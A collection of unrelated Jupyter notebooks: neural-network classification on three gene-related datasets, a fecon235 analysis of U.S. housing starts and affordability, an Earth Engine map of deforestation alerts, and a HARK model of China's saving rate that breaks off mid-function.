new_dataframe = pd.read_excel(new_file, sheet_name=0)
new_dataframe1 = pd.read_excel(new_file, sheet_name=2).iloc[:, range(16)]
new_dataframe2 = pd.read_excel(new_file, sheet_name=2).iloc[:, range(17,31)]
# Dataset1
new_dataframe.info()
# Dataset2
new_dataframe1.info()
# Dataset3
new_dataframe2.info()
```
## Dataset for outside validation
```
## outside validation
test_frame1 = pd.read_excel(new_file, sheet_name=1)
test_frame2 = pd.read_excel(new_file, sheet_name=3).iloc[:, range(16)]
test_frame3 = pd.read_excel(new_file, sheet_name=3).iloc[:, range(17,31)]
# Dataset1
X_first = new_dataframe.iloc[:,range(0,11)]
y_first = new_dataframe.iloc[:, -1] # 第二个指标
X_first = np.asarray(X_first)
# Dataset2
X_second = new_dataframe1.iloc[:,range(0,15)]
y_second = new_dataframe1.iloc[:, -1] # 第二个指标
X_second = np.asarray(X_second)
# Dataset3
X_third = new_dataframe2.iloc[:,range(0,13)]
y_third = new_dataframe2.iloc[:, -1] # 第二个指标
X_third = np.asarray(X_third)
y_first = np.array(y_first)
y_second = np.array(y_second)
y_third = np.array(y_third)
X_train_first, X_test_first, y_train_first, y_test_first= train_test_split(X_first, y_first, test_size=0.2, random_state=100)
X_test_first = torch.Tensor(X_test_first)
X_train_first = torch.Tensor(X_train_first)
y_train_first = torch.Tensor(y_train_first)
y_test_first = torch.Tensor(y_test_first)
X_train_second, X_test_second, y_train_second, y_test_second = train_test_split(X_second, y_second, test_size=0.2, random_state=100)
X_train_second = torch.Tensor(X_train_second)
X_test_second = torch.Tensor(X_test_second)
y_train_second = torch.Tensor(y_train_second)
y_test_second = torch.Tensor(y_test_second)
X_train_third, X_test_third, y_train_third, y_test_third = train_test_split(X_third, y_third, test_size=0.2, random_state=100)
X_train_third, X_test_third, y_train_third, y_test_third = torch.Tensor(X_train_third), torch.Tensor(X_test_third),torch.Tensor(y_train_third),torch.Tensor(y_test_third)
```
## ANN Training
### Model for Dataset1
```
class Feedforward_first(torch.nn.Module):
def __init__(self, input_size, hidden_size):
super(Feedforward_first, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.batchnorm = torch.nn.BatchNorm1d(self.hidden_size)
self.laynorm = torch.nn.LayerNorm(self.input_size)
self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)
self.relu = torch.nn.ReLU()
self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)
self.relu2 = torch.nn.ReLU()
self.fc3 = torch.nn.Linear(5, 1, bias=True)
self.sigmoid = torch.nn.Sigmoid()
def forward(self, x):
hidden = self.fc1(x)
batchnorm = self.batchnorm(hidden)
layborm = self.batchnorm(batchnorm)
relu = self.relu(batchnorm)
output = self.fc2(relu)
output = self.relu2(output)
output = self.fc3(output)
output = self.sigmoid(output)
return output
X_train_first.shape[1]
model1 = Feedforward_first(X_train_first.shape[1],10)
criterion1 = torch.nn.BCELoss()
optimizer1 = torch.optim.SGD(model1.parameters(), lr = 0.01, momentum=0.9, weight_decay= 0.001)
model1.train()
epoch = 200
loss_array = []
for epoch in range(epoch):
optimizer1.zero_grad()
# Forward pass
y_pred = model1(X_train_first)
# Compute Loss
loss = criterion1(y_pred.squeeze(), y_train_first)
loss_array.append(float(loss.item()))
print('Epoch {}: train loss: {}'.format(epoch, loss.item()))
# Backward pass
loss.backward()
optimizer1.step()
plt.plot(loss_array)
plt.title("Training Loss of ANN on Dataset1")
plt.xlabel("Epoches")
plt.ylabel("Loss Value")
model1.eval()
y_pred_first = model1(X_test_first)
y_pred_first_int = []
for item in y_pred_first:
y_pred_first_int.append(round(float(item[0])))
print(y_pred_first_int)
print(y_test_first)
print(np.sum(y_pred_first_int==np.array(y_test_first))/len(y_pred_first_int))
### accuracy on training set
y_pred = model1(X_train_first)
y_pred_int = []
for item in y_pred:
y_pred_int.append(round(float(item[0])))
print(y_pred_int)
print(y_train_first)
print(np.sum(y_pred_int==np.array(y_train_first))/len(y_pred_int))
### ROC and AUC for ANN1
y_label = y_test_first.int().tolist() # 非二进制需要pos_label
y_pre = y_pred_first_int
print(y_label)
print(y_pre)
fpr1, tpr1, thersholds1 = roc_curve(y_label, y_pre, pos_label=1)
fpr2, tpr2, thersholds2 = roc_curve(y_test_second, y_pred_second_int, pos_label=1)
fpr3, tpr3, thersholds3 = roc_curve(y_test_third, y_pred_third_int, pos_label=1)
# for i, value in enumerate(thersholds):
# print("%f %f %f" % (fpr[i], tpr[i], value))
roc_auc1 = auc(fpr1, tpr1)
roc_auc2 = auc(fpr2, tpr2)
roc_auc3 = auc(fpr3, tpr3)
plt.plot(fpr1, tpr1, 'k--', label='ROC (area = {0:.2f}) without Gene Sequence'.format(roc_auc1), lw=2, color='b')
plt.plot(fpr2, tpr2, 'k--', label='ROC (area = {0:.2f}) with TB53,rb1 and pik3ca'.format(roc_auc2), lw=2, color='r')
plt.plot(fpr3, tpr3, 'k--', label='ROC (area = {0:.2f}) with Number of Mutated Genes'.format(roc_auc3), lw=2, color='g')
plt.xlim([-0.05, 1.05]) # 设置x、y轴的上下限,以免和边缘重合,更好的观察图像的整体
plt.ylim([-0.05, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate') # 可以使用中文,但需要导入一些库即字体
plt.title('ROC Curves of ANN')
plt.legend(loc="lower right")
```
### Model for Dataset2
```
class Feedforward_second(torch.nn.Module):
def __init__(self, input_size, hidden_size):
super(Feedforward_second, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.batchnorm = torch.nn.BatchNorm1d(self.input_size)
self.laynorm = torch.nn.LayerNorm(self.input_size)
self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)
self.relu = torch.nn.ReLU()
self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)
self.fc3 = torch.nn.Linear(5, 1, bias=True)
self.sigmoid = torch.nn.Sigmoid()
def forward(self, x):
hidden = self.fc1(x)
batchnorm = self.batchnorm(hidden)
laynorm = self.laynorm(batchnorm)
relu = self.relu(laynorm)
output = self.fc2(relu)
output = self.fc3(output)
output = self.sigmoid(output)
return output
X_train_second
model2 = Feedforward_second(X_train_second.shape[1],15)
criterion2 = torch.nn.BCELoss()
optimizer2 = torch.optim.Adam(model2.parameters(), lr = 0.01, weight_decay= 0.001)
model2.train()
epoch = 200
loss_array = []
for epoch in range(epoch):
optimizer2.zero_grad()
# Forward pass
y_pred = model2(X_train_second)
# Compute Loss
loss = criterion2(y_pred.squeeze(), y_train_second)
loss_array.append(float(loss.item()))
print('Epoch {}: train loss: {}'.format(epoch, loss.item()))
# Backward pass
loss.backward()
optimizer2.step()
torch.save(model2, "ann_model.pt")
plt.plot(loss_array)
plt.title("Training Loss of ANN on Dataset2")
plt.xlabel("Epoches")
plt.ylabel("Loss Value")
model2.eval()
y_pred_second = model2(X_test_second)
y_pred_second_int = []
for item in y_pred_second:
y_pred_second_int.append(round(float(item[0])))
print(y_pred_second_int)
print(y_test_second)
print(np.sum(y_pred_second_int==np.array(y_test_second))/len(y_test_second))
### accuracy on training set
y_pred = model2(X_train_second)
y_pred_int = []
for item in y_pred:
y_pred_int.append(round(float(item[0])))
print(y_pred_int)
print(y_train_second)
print(np.sum(y_pred_int==np.array(y_train_second))/len(y_pred_int))
```
### Model for Dataset3
```
class Feedforward_third(torch.nn.Module):
def __init__(self, input_size, hidden_size):
super(Feedforward_third, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.batchnorm = torch.nn.BatchNorm1d(self.hidden_size)
self.laynorm = torch.nn.LayerNorm(self.input_size)
self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)
self.relu = torch.nn.ReLU()
self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)
self.relu2 = torch.nn.ReLU()
self.fc3 = torch.nn.Linear(5, 1, bias=True)
self.sigmoid = torch.nn.Sigmoid()
def forward(self, x):
hidden = self.fc1(x)
batchnorm = self.batchnorm(hidden)
laynorm = self.laynorm(batchnorm)
relu = self.relu(laynorm)
output = self.fc2(relu)
self.relu2 = torch.nn.ReLU()
output = self.fc3(output)
output = self.sigmoid(output)
return output
model3 = Feedforward_third(X_train_third.shape[1],13)
criterion3 = torch.nn.BCELoss()
optimizer3 = torch.optim.Adam(model3.parameters(), lr = 0.01, weight_decay= 0.001)
model3.train()
epoch = 150
loss_array = []
for epoch in range(epoch):
optimizer3.zero_grad()
# Forward pass
y_pred = model3(X_train_third)
# Compute Loss
loss = criterion3(y_pred.squeeze(), y_train_third)
loss_array.append(float(loss.item()))
print('Epoch {}: train loss: {}'.format(epoch, loss.item()))
# Backward pass
loss.backward()
optimizer3.step()
plt.plot(loss_array)
plt.title("Training Loss of ANN on Dataset3")
plt.xlabel("Epoches")
plt.ylabel("Loss Value")
model3.eval()
y_pred = model3(X_test_third)
y_pred_third_int = []
for item in y_pred:
y_pred_third_int.append(round(float(item[0])))
print(len(y_pred_third_int))
print(len(y_test_third))
y_test_third = np.array(y_test_third)
print(np.sum(y_pred_third_int==y_test_third)/len(y_pred_third_int))
### accuracy on training set
y_pred = model3(X_train_third)
y_pred_int = []
for item in y_pred:
y_pred_int.append(round(float(item[0])))
print(y_pred_int)
print(y_train_third)
print(np.sum(y_pred_int==np.array(y_train_third))/len(y_pred_int))
```
|
github_jupyter
|
# Housing economy, home prices and affordibility
Alan Greenspan in 2014 pointed out that there was never a recovery from recession
without improvements in housing construction. Here we examine some relevant data,
including the Case-Shiller series, and derive an insightful
measure of the housing economy, **hscore**, which takes affordibility into account.
Contents:
- Housing Starts
- Constructing a Home Price Index
- Real home prices
- Indebtedness for typical home buyer
- hscore: Housing starts scored by affordability
- Concluding remarks
*Dependencies:*
- Repository: https://github.com/rsvp/fecon235
- Python: matplotlib, pandas
*CHANGE LOG*
2016-02-08 Fix issue #2 by v4 and p6 updates.
Our hscore index has been completely revised.
Another 12 months of additional data.
2015-02-10 Code review and revision.
2014-09-11 First version.
```
from fecon235.fecon235 import *
# PREAMBLE-p6.15.1223 :: Settings and system details
from __future__ import absolute_import, print_function
system.specs()
pwd = system.getpwd() # present working directory as variable.
print(" :: $pwd:", pwd)
# If a module is modified, automatically reload it:
%load_ext autoreload
%autoreload 2
# Use 0 to disable this feature.
# Notebook DISPLAY options:
# Represent pandas DataFrames as text; not HTML representation:
import pandas as pd
pd.set_option( 'display.notebook_repr_html', False )
# Beware, for MATH display, use %%latex, NOT the following:
# from IPython.display import Math
# from IPython.display import Latex
from IPython.display import HTML # useful for snippets
# e.g. HTML('<iframe src=http://en.mobile.wikipedia.org/?useformat=mobile width=700 height=350></iframe>')
from IPython.display import Image
# e.g. Image(filename='holt-winters-equations.png', embed=True) # url= also works
from IPython.display import YouTubeVideo
# e.g. YouTubeVideo('1j_HxD4iLn8', start='43', width=600, height=400)
from IPython.core import page
get_ipython().set_hook('show_in_pager', page.as_hook(page.display_page), 0)
# Or equivalently in config file: "InteractiveShell.display_page = True",
# which will display results in secondary notebook pager frame in a cell.
# Generate PLOTS inside notebook, "inline" generates static png:
%matplotlib inline
# "notebook" argument allows interactive zoom and resize.
```
## Housing Starts
*Housing starts* is an economic indicator that reflects the number of
privately owned new houses (technically housing units) on which
construction has been started in a given period.
We retrieve monthly data released by the U.S. Bureau of the Census.
```
# In thousands of units:
hs = get( m4housing )
# m4 indicates monthly frequency.
# plot( hs )
```
Since housing is what houses people, over the long-term
it is reasonable to examine **housing starts per capita**.
```
# US population in thousands:
pop = get( m4pop )
# Factor 100.00 converts operation to float and percentage terms:
hspop = todf((hs * 100.00) / pop)
plot( hspop )
```
**At the peaks, about 1% of the *US population got allocated new housing monthly*.
The lowest point shown is after the Great Recession at 0.2%.**
Clearly there's a downward historical trend, so to discern **short-term housing cycles**,
we detrend and normalize hspop.
```
plot(detrendnorm( hspop ))
```
Surprisingly, housing starts per capita during the Great Recession did not
exceed two standard deviations on the downside.
2015-02-10 and 2016-02-08: It appears that housing starts has recovered relatively
and is back to mean trend levels.
In the concluding section, we shall derive another measure of housing activity
which takes affordibility into account.
## Constructing a Home Price Index
The correlation between Case-Shiller indexes, 20-city vs 10-city, is practically 1.
Thus a mash-up is warranted to get data extended back to 1987.
Case-Shiller is not dollar denominated (but rather a chain of changes)
so we use the median sales prices from 2000 to mid-2014 released by the
National Association of Realtors to estimate home price,
see function **gethomepx** for explicit details.
```
# We can use ? or ?? to extract code info:
gethomepx??
# Our interface will not ask the user to enter such messy details...
homepx = get( m4homepx )
# m4 indicates monthly home prices.
# Case-Shiller is seasonally adjusted:
plot( homepx )
# so the plot appears relatively smooth.
# Geometric rate of return since 1987:
georet( homepx, 12 )
```
The first element tells us home prices have increased
approximately 3.7% per annum.
The third element shows price volatility of 2.5%
which is very low compared to other asset classes.
But this does not take into account inflation.
In any case, recent home prices are still below
the levels just before the Great Recession.
## Real home prices
```
# This is an synthetic deflator created from four sources:
# CPI and PCE, both headline and core:
defl = get( m4defl )
# "Real" will mean in terms of current dollars:
homepxr = todf( homepx * defl )
# r for real
plot( homepxr )
# Real geometric return of home prices:
georet( homepxr, 12 )
```
*Real* home prices since 1987 have increased at the approximate
rate of +1.3% per annum.
Note that the above does not account for annual property taxes
which could diminish of real price appreciation.
Perhaps home prices are only increasing because new stock of housing
has been declining over the long-term (as shown previously).
The years 1997-2006 is considered a **housing bubble**
due to the widespread availability of *subprime mortgages*
(cf. NINJA, No Income No Job Applicant, was often not rejected.)
**Median home prices *doubled* in real terms**: from \$140,000 to \$280,000.
**Great Recession took down home prices** (180-280)/280 = **-36% in real terms.**
2015-02-10: we are roughly at 200/280 = 71% of peak home price in real terms.
2016-02-08: we are roughly at 220/280 = 79% of peak home price in real terms.
## Indebtedness for typical home buyer
For a sketch, we assume a fixed premium for some long-term mortgages over 10-y Treasuries,
and then compute the number of hours needed to
pay *only the interest on the full home price* (i.e. no down payment assumed).
This sketch does not strive for strict veracity, but simply serves as an
indicator to model the housing economy.
```
mortpremium = 1.50
mortgage = todf( get(m4bond10) + mortpremium )
# Yearly interest to be paid off:
interest = todf( homepx * (mortgage / 100.00) )
# Wage is in dollars per hour:
wage = get( m4wage )
# Working hours to pay off just the interest:
interesthours = todf( interest / wage )
# Mortgage interest to be paid as portion of ANNUAL income,
# assuming 2000 working hours per year:
payhome = todf( interesthours / 2000.00 )
# We ignore tiny portion of mortgage payment made towards reducing principal.
# And of course, the huge disparity in earned income among the population.
plot( payhome )
```
If we assume 2000 hours worked per year (40 hours for 50 weeks), we can see that
interest payment can potentially take up to 50% of total annual pre-tax income.
2015-02-10: Currently that figure is about 20% so housing should be affordable,
but the population is uncertain about the risk on taking on debt.
(What if unemployment looms in the future?)
Prospects of deflation adds to the fear of such risk.
Debt is best taken on in inflationary environments.
The housing bubble clearly illustrated that
huge *price risk* of the underlying asset could be an important consideration.
Thus the renting a home (without any equity stake) may appear preferable over buying a home.
```
# # Forecast payhome for the next 12 months:
# forecast( payhome, 12 )
```
2016-02-09: Homes should be slightly more affordable: 19% of annual income -- perhaps
due to further declining interest rates, or even some
increase in wages for the typical American worker.
Caution: although the numbers may indicate increased affordability,
it has become *far more difficult to obtain mortgage financing due to
strict credit requirements*. The pendulum of scrutiny from the NINJA days of the
subprime era has swung to the opposite extreme.
Subprime mortgages were the root cause of the Great Recession.
This would require another notebook which studies credit flows
from financial institutions to home buyers.
Great Recession: There is evidence recently that families shifted to home rentals,
avoiding home ownership which would entail taking on mortgage debt.
Some home owners experienced negative equity.
And when the debt could not be paid due to wage loss, it seemed reasonable to
walk away from their homes, even if that meant damage to their credit worthiness.
*Housing construction had to compete with a large supply of foreclosed homes on the market.*
## hscore: Housing starts scored by affordability
The basic idea here is that housing starts can be weighted by some
proxy of "affordability."
An unsold housing unit cannot be good for a healthy economy.
Recall that our variable *payhome* was constructed as a function of
home price, interest rate, and wage income -- to solve for the portion
of annual income needed to pay off a home purchase -- i.e. indebtedness.
**Home affordability** can thus be *abstractly* represented as 0 < (1-payhome) < 1,
by ignoring living expenses of the home buyer.
```
afford = todf( 1 - payhome )
# hspop can be interpreted as the percentage of the population allocated new housing.
# Let's weight hspop by afford to score housing starts...
hscore = todf( hspop * afford )
# ... loosely interpretated as new "affordable" housing relative to population.
plot( hscore )
stat( hscore )
```
**hscore** can be roughly interpreted as "affordable" housing starts
expressed as percentage of the total U.S. population.
The overall mean of *hscore* is approximately 0.31, and we observe a band between
0.31 and 0.47 from 1993 to 2004.
That band could be interpreted as an equilibrium region for the housing economy
(before the Housing Bubble and Great Recession).
It's also worth noting that long-term interest rates during that epoch was
determined by the market -- yet untouched by the massive *quantitative easing*
programs initiated by the Federal Reserve.
```
# Forecast for hscore, 12-months ahead:
forecast( hscore, 12 )
```
## Concluding remarks
We created an index **hscore** which expresses new "affordable" housing units
as percentage of total population. Affordability was crudely modeled by a few
well-known economic variables, plus our extended Case-Schiller index
of median home prices.
- 2016-02-09 Following the Great-Recession lows around 0.13, *hscore* has now reverted to its long-term mean of 0.31, *confirming the recovery*, and is forecasted to slightly increase to 0.33.
- The Fed terminated its QE program but has not sold off any of its mortgage securities. That reduces upward pressure on mortgage rates. However, our *hscore* supports the Fed's rate hike decision on 2015-12-16 since it gives evidence that the housing market has recovered midway between the housing bubble and the subprime mortgage crisis.
|
github_jupyter
|
<table class="ee-notebook-buttons" align="left">
<td><a target="_blank" href="https://github.com/giswqs/earthengine-py-notebooks/tree/master/Tutorials/Keiko/glad_alert.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td>
<td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/Tutorials/Keiko/glad_alert.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td>
<td><a target="_blank" href="https://mybinder.org/v2/gh/giswqs/earthengine-py-notebooks/master?filepath=Tutorials/Keiko/glad_alert.ipynb"><img width=58px src="https://mybinder.org/static/images/logo_social.png" />Run in binder</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/Tutorials/Keiko/glad_alert.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td>
</table>
## Install Earth Engine API
Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`.
The following script checks if the geehydro package has been installed. If not, it will install geehydro, which automatically install its dependencies, including earthengine-api and folium.
```
import subprocess
try:
import geehydro
except ImportError:
print('geehydro package not installed. Installing ...')
subprocess.check_call(["python", '-m', 'pip', 'install', 'geehydro'])
```
Import libraries
```
import ee
import folium
import geehydro
```
Authenticate and initialize Earth Engine API. You only need to authenticate the Earth Engine API once.
```
try:
ee.Initialize()
except Exception as e:
ee.Authenticate()
ee.Initialize()
```
## Create an interactive map
This step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function.
The optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`.
```
Map = folium.Map(location=[40, -100], zoom_start=4)
Map.setOptions('HYBRID')
```
## Add Earth Engine Python script
```
# Credits to: Keiko Nomura, Senior Analyst, Space Intelligence Ltd
# Source: https://medium.com/google-earth/10-tips-for-becoming-an-earth-engine-expert-b11aad9e598b
# GEE JS: https://code.earthengine.google.com/?scriptPath=users%2Fnkeikon%2Fmedium%3Afire_australia
geometry = ee.Geometry.Polygon(
[[[153.11338711694282, -28.12778417421283],
[153.11338711694282, -28.189835226562256],
[153.18943310693305, -28.189835226562256],
[153.18943310693305, -28.12778417421283]]])
Map.centerObject(ee.FeatureCollection(geometry), 14)
imageDec = ee.Image('COPERNICUS/S2_SR/20191202T235239_20191202T235239_T56JNP')
Map.addLayer(imageDec, {
'bands': ['B4', 'B3', 'B2'],
'min': 0,
'max': 1800
}, 'True colours (Dec 2019)')
Map.addLayer(imageDec, {
'bands': ['B3', 'B3', 'B3'],
'min': 0,
'max': 1800
}, 'grey')
# GLAD Alert (tree loss alert) from the University of Maryland
UMD = ee.ImageCollection('projects/glad/alert/UpdResult')
print(UMD)
# conf19 is 2019 alert 3 means multiple alerts
ASIAalert = ee.Image('projects/glad/alert/UpdResult/01_01_ASIA') \
.select(['conf19']).eq(3)
# Turn loss pixels into True colours and increase the green strength ('before' image)
imageLoss = imageDec.multiply(ASIAalert)
imageLoss_vis = imageLoss.selfMask().visualize(**{
'bands': ['B4', 'B3', 'B2'],
'min': 0,
'max': 1800
})
Map.addLayer(imageLoss_vis, {
'gamma': 0.6
}, '2019 loss alert pixels in True colours')
# It is still hard to see the loss area. You can circle them in red
# Scale the results in nominal value based on to the dataset's projection to display on the map
# Reprojecting with a specified scale ensures that pixel area does not change with zoom
buffered = ASIAalert.focal_max(50, 'circle', 'meters', 1)
bufferOnly = ASIAalert.add(buffered).eq(1)
prj = ASIAalert.projection()
scale = prj.nominalScale()
bufferScaled = bufferOnly.selfMask().reproject(prj.atScale(scale))
Map.addLayer(bufferScaled, {
'palette': 'red'
}, 'highlight the loss alert pixels')
# Create a grey background for mosaic
noAlert = imageDec.multiply(ASIAalert.eq(0))
grey = noAlert.multiply(bufferScaled.unmask().eq(0))
# Export the image
imageMosaic = ee.ImageCollection([
imageLoss_vis.visualize(**{
'gamma': 0.6
}),
bufferScaled.visualize(**{
'palette': 'red'
}),
grey.selfMask().visualize(**{
'bands': ['B3', 'B3', 'B3'],
'min': 0,
'max': 1800
})
]).mosaic()
#Map.addLayer(imageMosaic, {}, 'export')
# Export.image.toDrive({
# 'image': imageMosaic,
# description: 'Alert',
# 'region': geometry,
# crs: 'EPSG:3857',
# 'scale': 10
# })
```
## Display Earth Engine data layers
```
Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)
Map
```
|
github_jupyter
|
```
# Initial imports and notebook setup, click arrow to show
%matplotlib inline
# The first step is to be able to bring things in from different directories
import sys
import os
sys.path.insert(0, os.path.abspath('../lib'))
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
from util import log_progress
import HARK # Prevents import error from Demos repo
```
# Do Precautionary Motives Explain China's High Saving Rate?
The notebook [Nondurables-During-Great-Recession](http://econ-ark.org/notebooks/) shows that the collapse in consumer spending in the U.S. during the Great Recession could easily have been caused by a moderate and plausible increase in the degree of uncertainty.
But that exercise might make you worry that invoking difficult-to-measure "uncertainty" can explain anything (e.g. "the stock market fell today because the risk aversion of the representative agent increased").
The next exercise is designed to show that there are limits to the phenomena that can be explained by invoking plausible changes in uncertainty.
The specific question is whether a high degree of uncertainty can explain China's very high saving rate (approximately 25 percent), as some papers have proposed. Specifically, we ask "what beliefs about uncertainty would Chinese consumers need to hold in order to generate a saving rate of 25 percent, given the rapid pace of Chinese growth?"
### The Thought Experiment
In more detail, our consumers will initially live in a stationary, low-growth environment (intended to approximate China before 1978). Then, unexpectedly, income growth will surge at the same time that income uncertainty increases (intended to approximate the effect of economic reforms in China since 1978.) Consumers believe the high-growth, high-uncertainty state is highly persistent, but that ultimately growth will slow to a "normal" pace matching that of other advanced countries.
### The Baseline Model
We want the model to have these elements:
0. "Standard" infinite horizon consumption/savings model, with mortality and permanent and temporary shocks to income
0. The capacity to provide a reasonable match to the distribution of wealth inequality in advanced economies
0. Ex-ante heterogeneity in consumers' discount factors (to capture wealth inequality)
All of these are features of the model in the paper ["The Distribution of Wealth and the Marginal Propensity to Consume" by Carroll, Slacalek, Tokuoka, and White (2017)](http://econ.jhu.edu/people/ccarroll/papers/cstwMPC), for which all of the computational results were produced using the HARK toolkit. The results for that paper are available in the $\texttt{cstwMPC}$ directory.
### But With A Different ConsumerType
One feature that was not present in that model is important here:
- A Markov state that represents the state of the Chinese economy (to be detailed later)
HARK's $\texttt{MarkovConsumerType}$ is the right tool for this experiment. So we need to prepare the parameters to create that ConsumerType, and then create it.
```
# Initialize the cstwMPC parameters
init_China_parameters = {
"CRRA":1.0, # Coefficient of relative risk aversion
"Rfree":1.01/(1.0 - 1.0/160.0), # Survival probability,
"PermGroFac":[1.000**0.25], # Permanent income growth factor (no perm growth),
"PermGroFacAgg":1.0,
"BoroCnstArt":0.0,
"CubicBool":False,
"vFuncBool":False,
"PermShkStd":[(0.01*4/11)**0.5], # Standard deviation of permanent shocks to income
"PermShkCount":5, # Number of points in permanent income shock grid
"TranShkStd":[(0.01*4)**0.5], # Standard deviation of transitory shocks to income,
"TranShkCount":5, # Number of points in transitory income shock grid
"UnempPrb":0.07, # Probability of unemployment while working
"IncUnemp":0.15, # Unemployment benefit replacement rate
"UnempPrbRet":None,
"IncUnempRet":None,
"aXtraMin":0.00001, # Minimum end-of-period assets in grid
"aXtraMax":20, # Maximum end-of-period assets in grid
"aXtraCount":20, # Number of points in assets grid,
"aXtraExtra":[None],
"aXtraNestFac":3, # Number of times to 'exponentially nest' when constructing assets grid
"LivPrb":[1.0 - 1.0/160.0], # Survival probability
"DiscFac":0.97, # Default intertemporal discount factor, # dummy value, will be overwritten
"cycles":0,
"T_cycle":1,
"T_retire":0,
'T_sim':1200, # Number of periods to simulate (idiosyncratic shocks model, perpetual youth)
'T_age': 400,
'IndL': 10.0/9.0, # Labor supply per individual (constant),
'aNrmInitMean':np.log(0.00001),
'aNrmInitStd':0.0,
'pLvlInitMean':0.0,
'pLvlInitStd':0.0,
'AgentCount':0, # will be overwritten by parameter distributor
}
```
### Set Up the Growth Process
For a Markov model, we need a Markov transition array. Here, we create that array.
Remember, for this simple example, we just have a low-growth state, and a high-growth state
```
StateCount = 2 #number of Markov states
ProbGrowthEnds = (1./160.) #probability agents assign to the high-growth state ending
MrkvArray = np.array([[1.,0.],[ProbGrowthEnds,1.-ProbGrowthEnds]]) #Markov array
init_China_parameters['MrkvArray'] = [MrkvArray] #assign the Markov array as a parameter
```
One other parameter needs to change: the number of agents in simulation. We want to increase this, because later on when we vastly increase the variance of the permanent income shock, things get wonky. (We need to change this value here, before we have used the parameters to initialize the $\texttt{MarkovConsumerType}$, because this parameter is used during initialization.)
Other parameters that are not used during initialization can also be assigned here, by changing the appropriate value in the $\texttt{init_China_parameters_dictionary}$; however, they can also be changed later, by altering the appropriate attribute of the initialized $\texttt{MarkovConsumerType}$.
```
init_China_parameters['AgentCount'] = 10000
```
### Import and initialize the Agents
Here, we bring in an agent making a consumption/savings decision every period, subject to transitory and permanent income shocks, AND a Markov shock
```
from HARK.ConsumptionSaving.ConsMarkovModel import MarkovConsumerType
ChinaExample = MarkovConsumerType(**init_China_parameters)
```
Currently, Markov states can differ in their interest factor, permanent growth factor, survival probability, and income distribution. Each of these needs to be specifically set.
Do that here, except income distribution, which will be done later (because we want to examine the consequences of different income distributions).
```
ChinaExample.assignParameters(PermGroFac = [np.array([1.,1.06 ** (.25)])], #needs to be a list, with 0th element of shape of shape (StateCount,)
Rfree = np.array(StateCount*[init_China_parameters['Rfree']]), #need to be an array, of shape (StateCount,)
LivPrb = [np.array(StateCount*[init_China_parameters['LivPrb']][0])], #needs to be a list, with 0th element of shape of shape (StateCount,)
cycles = 0)
ChinaExample.track_vars = ['aNrmNow','cNrmNow','pLvlNow'] # Names of variables to be tracked
```
Now, add in ex-ante heterogeneity in consumers' discount factors
The cstwMPC parameters do not define a discount factor, since there is ex-ante heterogeneity in the discount factor. To prepare to create this ex-ante heterogeneity, first create the desired number of consumer types:
```
num_consumer_types = 7 # declare the number of types we want
ChineseConsumerTypes = [] # initialize an empty list
for nn in log_progress(range(num_consumer_types), every=1):
# Now create the types, and append them to the list ChineseConsumerTypes
newType = deepcopy(ChinaExample)
ChineseConsumerTypes.append(newType)
```
Now, generate the desired ex-ante heterogeneity, by giving the different consumer types each with their own discount factor.
First, decide the discount factors to assign:
```
from HARK.utilities import approxUniform
bottomDiscFac = 0.9800
topDiscFac = 0.9934
DiscFac_list = approxUniform(N=num_consumer_types,bot=bottomDiscFac,top=topDiscFac)[1]
# Now, assign the discount factors we want to the ChineseConsumerTypes
for j in log_progress(range(num_consumer_types), every=1):
ChineseConsumerTypes[j].DiscFac = DiscFac_list[j]
```
## Setting Up the Experiment
The experiment is performed by a function we will now write.
Recall that all parameters have been assigned appropriately, except for the income process.
This is because we want to see how much uncertainty needs to accompany the high-growth state to generate the desired high savings rate.
Therefore, among other things, this function will have to initialize and assign the appropriate income process.
```
# First create the income distribution in the low-growth state, which we will not change
from HARK.ConsumptionSaving.ConsIndShockModel import constructLognormalIncomeProcessUnemployment
import HARK.ConsumptionSaving.ConsumerParameters as IncomeParams
LowGrowthIncomeDstn = constructLognormalIncomeProcessUnemployment(IncomeParams)[0][0]
# Remember the standard deviation of the permanent income shock in the low-growth state for later
LowGrowth_PermShkStd = IncomeParams.PermShkStd
def calcNatlSavingRate(PrmShkVar_multiplier,RNG_seed = 0):
"""
This function actually performs the experiment we want.
Remember this experiment is: get consumers into the steady-state associated with the low-growth
regime. Then, give them an unanticipated shock that increases the income growth rate
and permanent income uncertainty at the same time. What happens to the path for
the national saving rate? Can an increase in permanent income uncertainty
explain the high Chinese saving rate since economic reforms began?
The inputs are:
* PrmShkVar_multiplier, the number by which we want to multiply the variance
of the permanent shock in the low-growth state to get the variance of the
permanent shock in the high-growth state
* RNG_seed, an integer to seed the random number generator for simulations. This useful
because we are going to run this function for different values of PrmShkVar_multiplier,
and we may not necessarily want the simulated agents in each run to experience
the same (normalized) shocks.
"""
# First, make a deepcopy of the ChineseConsumerTypes (each with their own discount factor),
# because we are going to alter them
